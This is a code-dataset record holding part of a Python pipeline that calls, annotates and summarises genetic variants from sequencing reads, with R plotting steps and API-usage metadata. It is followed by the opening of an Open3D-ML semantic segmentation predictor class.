ref_path, sam_name)\n if gret == 0:\n Path('{0}/gatk.rt'.format(completion_path)).touch()\n if gret != 0:\n raise RuntimeError('GATK HaplotypeCaller failed to complete; Exiting MARs')\n else:\n main_logger.debug('GATK HaplotypeCaller completed')\n\n #Call Kestrel to generate VCF files\n #kestrel_path = 'lib/kestrel/kestrel.jar'\n #kanalyze_path = 'lib/kestrel/kanalyze.jar'\n #varcaller = KestrelVar(rone_path, rtwo_path, ref_path, kanalyze_path,\n # kestrel_path, out_path)\n #varcaller = GenAnTK(gatk_path, out_path, java_path)\n #main_logger.debug('Running Kestrel')\n #if os.path.exists('{0}/kestrel.rt'.format(completion_path)):\n # kvcf_path = '{0}/variants_kes.vcf'.format(out_path)\n # kret = 0\n # main_logger.debug('Skipping Kestrel')\n #else:\n # kvcf_path, kret = varcaller.run_kestrel()\n # if kret == 0:\n # Path('{0}/kestrel.rt'.format(completion_path)).touch()\n #if kret != 0:\n # raise RuntimeError('Kestrel failed to complete; Exiting MARs')\n #else:\n # main_logger.debug('Kestrel stats completed')\n\n #Filter and annotate variant calls\n main_logger.debug('Annotating variants')\n annotate = Vcf.Annotate()\n gvcf_path = annotate.getAnnotation(bed_path, gvcf_path, ref_path, out_path)\n vcf_path = annotate.getAnnotation(bed_path, vcf_path, ref_path, out_path)\n main_logger.debug('Filtering low quality variants and merging GATK and Samtools calls')\n gvcf_file = Vcf.Reader(gvcf_path)\n svcf_file = Vcf.Reader(vcf_path)\n merge_vcf = Vcf.Merge(gvcf_file, svcf_file)\n merged_vcf = merge_vcf.merge(out_path)\n# merged_vcf = annotate.iterVcf(bed_path, merged_vcf, sam_name, ref_path, 'merged')\n# gatk_vcf = annotate.iterVcf(bed_path, gvcf_path, sam_name, ref_path, 'gatk')\n# samtools_vcf = annotate.iterVcf(bed_path, vcf_path , sam_name, ref_path, 'samtools')\n summary = Summary(ref_path, bed_path, voi_path, out_dir)\n var_sum = summary.getVarStats(merged_vcf)\n main_logger.info('Total variants : {0}; Verified calls : {1}; Exonic : {2}; Intronic : {3}; Synonymous : {4}; Non Synonymous : {5}; Transition : {6}; Transversion : {7}'.format(\n var_sum[0], var_sum[1], var_sum[2], var_sum[3], var_sum[4], var_sum[5], var_sum[6], var_sum[7]))\n return(merged_vcf, 0)\n\ndef marsBatch(bbduk_path, aligner_path, smt_path, bft_path, gatk_path,\n inp_path, ref_path, adp_path, bed_path, out_dir, aligner,\n pic_path, voi_path, java_path, sra_path):\n #Creating logger for pyamd\n logger = logging.getLogger('Kookaburra')\n logger.setLevel(logging.DEBUG)\n #Create output paths for the run\n if not os.path.exists(os.path.abspath(out_dir)):\n os.mkdir(os.path.abspath(out_dir))\n # Creating a file handler which logs even debug messages\n fh = logging.FileHandler('{0}/kookaburra.log'.format(os.path.abspath(out_dir)))\n fh.setLevel(logging.DEBUG)\n # Creating a console handler to log info messages\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n # Create formatter and add it to the handlers\n formatter = logging.Formatter('{asctime} - {name} - {levelname} - {message}', style=\"{\")\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n # Add the handlers to the logger\n logger.addHandler(fh)\n logger.addHandler(ch)\n #Create file and console handlers for MaRS\n logger.info('Gathering input information from input path.')\n prep = Prepper(inp_path, sra_path)\n config = prep.prepInputs()\n logger.info('Running MaRS on {0} experiments'.format(len(config)))\n #summary = Summary(ref_path, bed_path, voi_path, out_dir)\n samples = config.keys()\n pools = Pool(4)\n rone_list = list()\n rtwo_list = 
list()\n name_list = list()\n for samples in config:\n name_list.append(config[samples].sample)\n rone_list.append(config[samples].files[0])\n rtwo_list.append(config[samples].files[1])\n\n\n vcf_list = pools.map(main, zip(repeat(bbduk_path), repeat(aligner_path),\n repeat(smt_path), repeat(bft_path), repeat(gatk_path),\n rone_list, rtwo_list, repeat(ref_path), repeat(adp_path),\n repeat(bed_path), repeat(out_dir), repeat(aligner),\n repeat(pic_path), name_list, repeat(voi_path),\n repeat(java_path)))\n\n logger.info('Summarizing variant calls from all {0} experiments'.format(len(config)))\n summary = Summary(ref_path, bed_path, voi_path, out_dir)\n #Summarize variants of interest\n exp_voi = summary.getRepSnps()\n exp_voi = summary.getDepthStats(exp_voi)\n exp_voi = exp_voi.reset_index(level=1)\n #exp_voi.drop_duplicates(subset='Variant', inplace=True)\n exp_voi[['Gene_name', 'RefAA_sym', 'AAPos_sort', 'AltAA_sym']] = exp_voi['Variant'].str.extract('(?P<Gene_name>[a-zA-Z0-9]+):(?P<RefAA_sym>[a-zA-Z]?)(?P<AAPos_sort>[0-9]+)(?P<AltAA_sym>[a-zA-Z]?)', expand=True)\n exp_voi['Sample_name'] = exp_voi.index\n exp_voi['AAPos_sort'] = pd.to_numeric(exp_voi['AAPos_sort'])\n exp_voi.sort_values(['Sample_name', 'Gene_name', 'AAPos_sort'], inplace=True)\n exp_voi.drop(labels=['Sample_name', 'Gene_name', 'RefAA_sym', 'AAPos_sort',\n 'AltAA_sym','Sample'], axis=1, inplace=True)\n exp_voi.to_csv('{0}/Study_variants.csv'.format(out_dir))\n\n exp_af = exp_voi.pivot(exp_voi.index, 'Variant')['AF'].transpose()\n exp_af['Variant'] = exp_af.index\n exp_af[['Gene_name', 'RefAA_sym', 'AAPos_sort', 'AltAA_sym']] = exp_af['Variant'].str.extract('(?P<Gene_name>[a-zA-Z0-9]+):(?P<RefAA_sym>[a-zA-Z]?)(?P<AAPos_sort>[0-9]+)(?P<AltAA_sym>[a-zA-Z]?)', expand=True)\n exp_af['AAPos_sort'] = pd.to_numeric(exp_af['AAPos_sort'])\n exp_af.sort_values(['Gene_name', 'AAPos_sort'], inplace=True)\n exp_af.drop(labels=['Variant', 'Gene_name', 'RefAA_sym', 'AAPos_sort',\n 'AltAA_sym'], axis=1, inplace=True)\n af_mask = exp_af.isnull()\n exp_af.to_csv('{0}/Study_reportable_variants_allele_frequency.csv'.format(out_dir))\n# summary.plotHeatMap(exp_af, 'voi_af', af_mask)\n exp_dp = exp_voi.pivot(exp_voi.index, 'Variant')['DP'].transpose()\n exp_dp['Variant'] = exp_dp.index\n exp_dp[['Gene_name', 'RefAA_sym', 'AAPos_sort', 'AltAA_sym']] = exp_dp['Variant'].str.extract('(?P<Gene_name>[a-zA-Z0-9]+):(?P<RefAA_sym>[a-zA-Z]?)(?P<AAPos_sort>[0-9]+)(?P<AltAA_sym>[a-zA-Z]?)', expand=True)\n exp_dp['AAPos_sort'] = pd.to_numeric(exp_dp['AAPos_sort'])\n exp_dp.sort_values(['Gene_name', 'AAPos_sort'], inplace=True)\n exp_dp.drop(labels=['Variant', 'Gene_name', 'RefAA_sym', 'AAPos_sort',\n 'AltAA_sym'], axis=1, inplace=True)\n dp_mask = exp_dp.isnull()\n exp_dp.to_csv('{0}/Study_reportable_variants_depth.csv'.format(out_dir))\n# summary.plotHeatMap(exp_dp, 'voi_dp', dp_mask)\n# summary.plotCountPlot(exp_af, 'voi')\n #Summarize novel variants\n exp_nov = summary.getNovSnps()\n exp_nov = summary.getNovDepthStats(exp_nov)\n exp_nov = exp_nov.reset_index(level=1)\n exp_nov[['Gene_name', 'RefAA_sym', 'AAPos_sort', 'AltAA_sym']] = exp_nov['Variant'].str.extract('(?P<Gene_name>[a-zA-Z0-9]+):(?P<RefAA_sym>[a-zA-Z]?)(?P<AAPos_sort>[0-9]+)(?P<AltAA_sym>[a-zA-Z]?)', expand=True)\n exp_nov['Sample_name'] = exp_nov.index\n exp_nov['AAPos_sort'] = pd.to_numeric(exp_nov['AAPos_sort'])\n exp_nov.sort_values(['Sample_name', 'Gene_name', 'AAPos_sort'], inplace=True)\n exp_nov.drop(labels=['Sample_name', 'Gene_name', 'RefAA_sym', 'AAPos_sort',\n 'AltAA_sym', 'Sample'], axis=1, inplace=True)\n exp_nov.to_csv('{0}/Study_novel_exonic_variants.csv'.format(out_dir))\n #Separate and capture Intron and exonic variants\n exp_nov_af = 
exp_nov.loc[:,['Variant', 'AF']]\n exp_nov_af[['Gene_name', 'RefAA_sym', 'AAPos_sort', 'AltAA_sym']] = exp_nov_af['Variant'].str.extract('(?P<Gene_name>[a-zA-Z0-9]+):(?P<RefAA_sym>[a-zA-Z]?)(?P<AAPos_sort>[0-9]+)(?P<AltAA_sym>[a-zA-Z]?)', expand=True)\n exp_nov_af['AAPos_sort'] = pd.to_numeric(exp_nov_af['AAPos_sort'])\n exp_nov_af.sort_values(['Gene_name', 'AAPos_sort'], inplace=True)\n exp_nov_af.drop(labels=['Variant', 'Gene_name', 'RefAA_sym', 'AAPos_sort',\n 'AltAA_sym'], axis=1, inplace=True)\n exp_nov_af.to_csv('{0}/Study_novel_variants_allele_frequency.csv'.format(out_dir))\n exp_nov_dp = exp_nov.loc[:,['Variant', 'DP']]\n exp_nov_dp['Variant'] = exp_nov_dp.index\n exp_nov_dp[['Gene_name', 'RefAA_sym', 'AAPos_sort', 'AltAA_sym']] = exp_nov_dp['Variant'].str.extract('(?P<Gene_name>[a-zA-Z0-9]+):(?P<RefAA_sym>[a-zA-Z]?)(?P<AAPos_sort>[0-9]+)(?P<AltAA_sym>[a-zA-Z]?)', expand=True)\n exp_nov_dp['AAPos_sort'] = pd.to_numeric(exp_nov_dp['AAPos_sort'])\n exp_nov_dp.sort_values(['Gene_name', 'AAPos_sort'], inplace=True)\n exp_nov_dp.drop(labels=['Variant', 'Gene_name', 'RefAA_sym', 'AAPos_sort',\n 'AltAA_sym'], axis=1, inplace=True)\n exp_nov_dp.to_csv('{0}/Study_novel_variants_depth.csv'.format(out_dir))\n exp_intron = summary.getIntronTables()\n exp_intron = exp_intron.reset_index()\n\n #print(exp_intron.index)\n #exp_intron.reset_index(level=1)\n# print(exp_intron.head())\n exp_intron[['Gene_name', 'RefAA_sym', 'AAPos_sort', 'AltAA_sym']] = exp_intron['Variant'].str.extract('(?P<Gene_name>[a-zA-Z0-9]+):(?P<RefAA_sym>[a-zA-Z]?)(?P<AAPos_sort>[0-9]+)(?P<AltAA_sym>[a-zA-Z]?)', expand=True)\n #exp_intron['']\n exp_intron['AAPos_sort'] = pd.to_numeric(exp_intron['AAPos_sort'])\n exp_intron.sort_values(['Sample', 'Gene_name', 'AAPos_sort'], inplace=True)\n exp_intron.drop(labels=['Gene_name', 'RefAA_sym', 'AAPos_sort',\n 'AltAA_sym' ], axis=1, inplace=True)\n exp_intron.sort_index().reset_index(drop=True).to_csv('{0}/Study_novel_intronic_variants.csv'.format(out_dir), index=False)\n # Plot using Rscript\n logger.info('Plotting Depth Per SNP')\n dcmd = ['Rscript', 'pyamd/Rscripts/DepthPerReportSNP.R', '-i',\n '{0}/Study_reportable_variants_depth.csv'.format(out_dir), '-o',\n '{0}/Study_depth.pdf'.format(out_dir)]\n drun = subprocess.Popen(dcmd, shell=False,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n drun.wait()\n if drun.returncode != 0:\n logger.error('Failed to execute DepthPerReportSNP.R')\n logger.error(' '.join(dcmd))\n\n logger.info('Plotting Reportable SNPs Frequency')\n acmd = ['Rscript', 'pyamd/Rscripts/reportableSNPsFreq.R', '-i',\n '{0}/Study_variants.csv'.format(out_dir), '-r',\n 'ref/Reportable_SNPs.csv', '-o', '{0}/'.format(out_dir)]\n arun = subprocess.Popen(acmd, shell=False,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n arun.wait()\n if arun.returncode != 0:\n logger.error('Failed to execute reportableSNPsFreq.R')\n logger.error(' '.join(acmd))\n logger.info('Plotting Novel Exonic Non-Synonymous SNPs')\n nenscmd = ['Rscript', 'pyamd/Rscripts/NovelExonicNonSynSNPs.R', '-i',\n '{0}/Study_novel_exonic_variants.csv'.format(out_dir),\n '-o', '{0}/'.format(out_dir)]\n nensrun = subprocess.Popen(nenscmd, shell=False,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n nensrun.wait()\n if nensrun.returncode != 0:\n logger.error('Failed to execute NovelExonicNonSynSNPs.R')\n logger.error(' '.join(nenscmd))\n\n logger.info('Plotting Novel Exonic Synonymous SNPs')\n nescmd = ['Rscript', 'pyamd/Rscripts/NovelExonicSynSNPs.R', '-i',\n '{0}/Study_novel_exonic_variants.csv'.format(out_dir),\n '-o', '{0}/'.format(out_dir)]\n nesrun = subprocess.Popen(nescmd, shell=False,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n 
nesrun.wait()\n if nesrun.returncode != 0:\n logger.error('Failed to execute NovelExonicSynSNPs.R')\n logger.error(' '.join(nescmd))\n\n logger.info('Plotting Novel Intronic SNPs')\n nicmd = ['Rscript', 'pyamd/Rscripts/NovelIntronicSNPs.R', '-i',\n '{0}/Study_novel_intronic_variants.csv'.format(out_dir),\n '-o', '{0}/'.format(out_dir)]\n nirun = subprocess.Popen(nicmd, shell=False,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n nirun.wait()\n if nirun.returncode != 0:\n logger.error('Failed to execute NovelIntronicSNPs.R')\n logger.error(' '.join(nicmd))\n\n #os.remove('{0}/Reportable_SNPs_Report.csv'.format(out_dir))\n os.remove('{0}/novel_SNPs_exonic_syn.csv'.format(out_dir))\n os.remove('{0}/novel_SNPs_intronic.csv'.format(out_dir))\n os.remove('{0}/novel_SNPs_exonic_nonsyn.csv'.format(out_dir))\n os.remove('{0}/Study_novel_exonic_variants_filtered.csv'.format(out_dir))\n os.remove('{0}/Study_novel_intronic_variants_filtered.csv'.format(out_dir))\n return(0)\n\nif __name__ == '__main__':\n #Define default paths and aligner information\n def_path = \"{0}/lib\".format(os.path.abspath(os.path.dirname(os.path.realpath(__file__))))\n ref_def_path = \"{0}/ref\".format(os.path.abspath(os.path.dirname(os.path.realpath(__file__))))\n bbduk_def = 'bbduk.sh' #\"{0}/bbmap/bbduk.sh\".format(def_path)\n bbmap_def = 'bbmap.sh' #\"{0}/bbmap/bbmap.sh\".format(def_path)\n bwa_def = 'bwa' #\"{0}/bwa/bwa\".format(def_path)\n bowtie_def = 'bowtie2' #\"{0}/bowtie2/bowtie2\".format(def_path)\n snap_def = 'snap-aligner' #\"{0}/snap/snap-aligner\".format(def_path)\n smt_def = 'samtools' #\"{0}/samtools/samtools\".format(def_path)\n bft_def = 'bcftools' #\"{0}/bcftools/bcftools\".format(def_path)\n gatk_def = 'gatk' #\"{0}/GenomeAnalysisTK.jar\".format(def_path)\n pic_def = 'picard' #\"{0}/picard.jar\".format(def_path)\n sra_def = 'fastq-dump' #'{0}/sratoolkit/bin/fastq-dump'.format(def_path)\n voi_def = '{0}/Reportable_SNPs.csv'.format(ref_def_path)\n #if 'java version \"1.8.' 
in str(subprocess.check_output([\"java\", \"-version\"], stderr=subprocess.STDOUT).decode('UTF-8').split('\\n')[0]):\n java_def = 'java'\n #else:\n # java_def = \"{0}/jdk/bin/java\".format(def_path)\n aligner_def = {'bwa' : bwa_def, 'snap' : snap_def, 'bowtie2': bowtie_def, 'bbmap': bbmap_def}\n #Get arguments\n parser = argparse.ArgumentParser(prog='kookaburra')\n parser.add_argument('-i', '--inp_path', type=str,\n help='Path to input directory (Specify only for batch mode)')\n parser.add_argument('-1', '--fwd', dest='rone_path', type=str,\n help='Path to forward reads fastq', )\n parser.add_argument('-2', '--rev', dest='rtwo_path', type=str,\n help='Path to reverse reads fastq')\n parser.add_argument('-r', '--ref', dest='ref_path', type=str,\n help='Path to Reference fasta file', required=True)\n parser.add_argument('-a', '--adapter', dest='adp_path', type=str,\n help='Path to Adapter fasta file', required=True)\n parser.add_argument('-b', '--bed', dest='bed_path', type=str,\n help='Path to Bed file for MDR regions', required=True)\n parser.add_argument('-o', '--outpath', dest='out_path', type=str,\n help='Path where all outputs will be stored', required=True)\n parser.add_argument('-n', '--sam_name', dest='sam_name', type=str,\n help='Sample name', default=None)\n parser.add_argument('-m', '--mapper', dest='aligner', type=str,\n choices=['bowtie2', 'bwa', 'bbmap', 'snap'],\n default='bwa', help='The aligner to be used by MARs')\n parser.add_argument('--bbduk', dest='bbduk_path', type=str, default=bbduk_def,\n help='Path to BBduk executable')\n parser.add_argument('--aligner', dest='aligner_path', type=str, default=None,\n help='Path to aligner executable')\n parser.add_argument('--samtools', dest='smt_path', type=str, default=smt_def,\n help='Path to Samtools executable')\n parser.add_argument('--gatk', dest='gatk_path', type=str, default=gatk_def,\n help='Path to GATK executable')\n parser.add_argument('--bcftools', dest='bft_path', type=str, default=bft_def,\n help='Path to Bcftools executable')\n parser.add_argument('--picard', dest='pic_path', type=str, default=pic_def,\n help='Path to Picard executable')\n parser.add_argument('--varofint', dest='voi_path', type=str, default=voi_def,\n help='Path to variant of interest')\n args = parser.parse_args()\n\n #Validate parsed arguments\n if args.aligner_path is None:\n args.aligner_path = aligner_def[args.aligner]\n\n if not os.path.exists(args.out_path):\n os.mkdir(args.out_path)\n\n #Check if the run command is for batch mode analysis or single sample\n #analysis.\n #If inp_path is empty and rone_path is not, then the experiment is a\n #single sample experiment.\n status = marsBatch(args.bbduk_path, args.aligner_path, args.smt_path,\n args.bft_path, args.gatk_path, args.inp_path, args.ref_path,\n args.adp_path, args.bed_path, args.out_path, args.aligner,\n args.pic_path, args.voi_path, java_def, sra_def)\n", "sub_path": "pyamd.py", "file_name": "pyamd.py", "file_ext": "py", "file_size_in_byte": 27458, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 55, "usage_type": "call"}, 
{"api_name": "os.path.exists", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 87, "usage_type": "call"}, {"api_name": "pyamd.bbduk.QualCheck", "line_number": 93, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pyamd.alignment.Bwa", "line_number": 110, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path", "line_number": 122, "usage_type": "attribute"}, {"api_name": "pyamd.alignment.Bowtie", "line_number": 127, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 130, "usage_type": "call"}, {"api_name": "pyamd.alignment.Snap", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path", "line_number": 149, "usage_type": "attribute"}, {"api_name": "pyamd.alignment.BBMap", "line_number": 153, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 156, "usage_type": "call"}, {"api_name": "pyamd.samtools.Samtools", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 165, "usage_type": "call"}, {"api_name": "os.path", "line_number": 165, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path", "line_number": 166, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 166, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 180, 
"usage_type": "call"}, {"api_name": "os.path", "line_number": 180, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 181, "usage_type": "call"}, {"api_name": "os.path", "line_number": 181, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 181, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 188, "usage_type": "call"}, {"api_name": "pyamd.gatk.Picard", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 196, "usage_type": "call"}, {"api_name": "os.path", "line_number": 196, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 197, "usage_type": "call"}, {"api_name": "os.path", "line_number": 197, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 197, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 212, "usage_type": "call"}, {"api_name": "os.path", "line_number": 212, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 220, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 226, "usage_type": "call"}, {"api_name": "os.path", "line_number": 226, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 233, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 239, "usage_type": "call"}, {"api_name": "os.path", "line_number": 239, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 247, "usage_type": "call"}, {"api_name": "pyamd.gatk.GenAnTK", "line_number": 263, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 265, "usage_type": "call"}, {"api_name": "os.path", "line_number": 265, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 272, "usage_type": "call"}, {"api_name": "pyamd.parsers.vcf.Vcf.Annotate", "line_number": 300, "usage_type": "call"}, {"api_name": "pyamd.parsers.vcf.Vcf", "line_number": 300, "usage_type": "name"}, {"api_name": "pyamd.parsers.vcf.Vcf.Reader", "line_number": 304, "usage_type": "call"}, {"api_name": "pyamd.parsers.vcf.Vcf", "line_number": 304, "usage_type": "name"}, {"api_name": "pyamd.parsers.vcf.Vcf.Reader", "line_number": 305, "usage_type": "call"}, {"api_name": "pyamd.parsers.vcf.Vcf", "line_number": 305, "usage_type": "name"}, {"api_name": "pyamd.parsers.vcf.Vcf.Merge", "line_number": 306, "usage_type": "call"}, {"api_name": "pyamd.parsers.vcf.Vcf", "line_number": 306, "usage_type": "name"}, {"api_name": "pyamd.summarize.Summary", "line_number": 311, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 321, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 322, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 324, "usage_type": "call"}, {"api_name": "os.path", "line_number": 324, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 324, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 325, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 325, "usage_type": "call"}, {"api_name": "os.path", "line_number": 325, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 327, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 327, "usage_type": "call"}, {"api_name": "os.path", "line_number": 327, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 328, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", 
"line_number": 330, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 331, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 333, "usage_type": "call"}, {"api_name": "pyamd.prepinputs.Prepper", "line_number": 341, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 346, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 356, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 357, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 358, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 359, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 360, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 361, "usage_type": "call"}, {"api_name": "pyamd.summarize.Summary", "line_number": 364, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 372, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 381, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 391, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 405, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 413, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 421, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 434, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 444, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 445, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 455, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 456, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 465, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 466, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 476, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 477, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 487, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 488, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 495, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 496, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 497, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 498, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 499, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 504, "usage_type": "call"}, {"api_name": "os.path", "line_number": 504, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 504, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 504, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 505, "usage_type": "call"}, {"api_name": "os.path", "line_number": 505, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 505, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 505, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 523, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 563, "usage_type": "call"}, {"api_name": "os.path", "line_number": 563, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 564, "usage_type": "call"}]} +{"seq_id": "447911137", "text": "import argparse\nimport copy\nimport os\nimport os.path as 
osp\nimport pprint\nimport sys\nimport time\nfrom pathlib import Path\n\nimport numpy as np\nimport yaml\n\n\nclass SemSegPredictor:\n def __init__(self):\n\n self.home_path = str(Path.home())\n self.base_path = self.home_path + \"/dev/Open3D-ML\"\n self.dataset_path = self.home_path + \"/datasets/SmartLab\"\n self.ckpt_path = self.base_path + \"/mytests/logs/RandLANet_SmartLab_tf/checkpoint/ckpt-6\"\n self.randlanet_smartlab_cfg = self.base_path + \"/ml3d/configs/randlanet_smartlab.yml\"\n self.kpconv_smartlab_cfg = self.base_path + \"/ml3d/configs/kpconv_smartlab.yml\"\n\n os.environ[\"OPEN3D_ML_ROOT\"] = self.base_path\n import open3d.ml as _ml3d\n\n self._ml3d = _ml3d\n\n kwargs = {\n \"framework\": \"tf\",\n \"device\": \"cuda\",\n \"dataset_path\": self.dataset_path,\n \"split\": \"test\",\n \"ckpt_path\": self.ckpt_path,\n \"cfg_file\": self.randlanet_smartlab_cfg,\n }\n\n self.args = type(\"args\", (object,), kwargs)()\n\n pprint.pprint(kwargs)\n\n if self.args.framework == \"torch\":\n import open3d.ml.torch as ml3d\n\n self.ml3d = ml3d\n else:\n import open3d.ml.tf as ml3d\n import tensorflow as tf\n\n self.ml3d = ml3d\n self.tf = tf\n\n def config_gpu(self):\n gpus = self.tf.config.experimental.list_physical_devices(\"GPU\")\n print(gpus)\n\n if gpus:\n try:\n for gpu in gpus:\n self.tf.config.experimental.set_memory_growth(gpu, True)\n if self.args.device == \"cpu\":\n self.tf.config.set_visible_devices([], \"GPU\")\n elif self.args.device == \"cuda\":\n self.tf.config.set_visible_devices(gpus[0], \"GPU\")\n else:\n idx = self.args.device.split(\":\")[1]\n self.tf.config.set_visible_devices(gpus[int(idx)], \"GPU\")\n except RuntimeError as e:\n print(e)\n\n @staticmethod\n def merge_cfg_file(cfg, args):\n if args.device is not None:\n cfg.pipeline.device = args.device\n cfg.model.device = args.device\n if args.split is not None:\n cfg.pipeline.split = args.split\n if args.dataset_path is not None:\n cfg.dataset.dataset_path = args.dataset_path\n if args.ckpt_path is not None:\n cfg.model.ckpt_path = args.ckpt_path\n\n return cfg.dataset, 